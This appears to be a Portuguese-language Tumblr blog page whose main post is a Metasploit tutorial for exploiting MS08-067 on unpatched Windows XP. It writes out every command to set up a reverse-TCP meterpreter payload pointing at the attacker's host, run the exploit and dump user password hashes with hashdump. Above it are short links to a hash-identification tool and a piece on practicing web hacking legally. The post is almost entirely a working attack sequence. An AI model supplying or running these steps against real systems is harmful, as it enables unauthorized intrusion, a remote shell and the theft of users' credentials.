1. 1 year ago 
   Hash ID

   “Software to identify the different types of hashes used to encrypt data and especially passwords.”

2. 1 year ago 
   Hacking Vulnerable Web Applications Without Going To Jail
3. Notes: 3 / 3 years ago 

   Obtendo hashes dos usuários do Windows XP vulnerável ao “MS08-067” em 3 minutos :)
   
   Utilizando Metasploit atualizado (05.01.2010 (happy new year ;)) e WinXP desatualizado (não tão difícil de acharmos).
   
   Selecionamos para usar o exploit ms08_067_netapi:

   msf > use exploit/windows/smb/ms08_067_netapi

   Setamos as opções básicas para o uso e o payload meterpreter de conexão reversa:

   msf exploit(ms08_067_netapi) > set RHOST 10.1.1.28
   msf exploit(ms08_067_netapi) > set LHOST 10.1.1.4
   msf exploit(ms08_067_netapi) > set LPORT 4662
   msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

   Por padrão o alvo é detectado automaticamente. Para listar os possíveis alvos (entre outras informações):

   msf exploit(ms08_067_netapi) > info

   Por exemplo, eu tenho o meu alvo com ID 29: 
   29 Windows XP SP2 Portuguese - Brazilian
   
   Seleciono o mesmo com:

   msf exploit(ms08_067_netapi) > set TARGET 29

   Ao fim de tudo (Run!! Run!!):

   msf exploit(ms08_067_netapi) > exploit

   Com a falha explorada com sucesso, caímos no CLI do meterpreter… aí é só executarmos o script hashdump e esperarmos alguns segundos:

   meterpreter > run hashdump

   Hashs “recuperados” :)

   • Tagged:
   • metasploit
   • meterpreter
   • hashdump

Victor Hugo P. Assunção (@victorhugopa)
tumblelog.
para quando 140 caracteres
não forem o bastante...

Following

Tumblr

Favoritos

BodeCast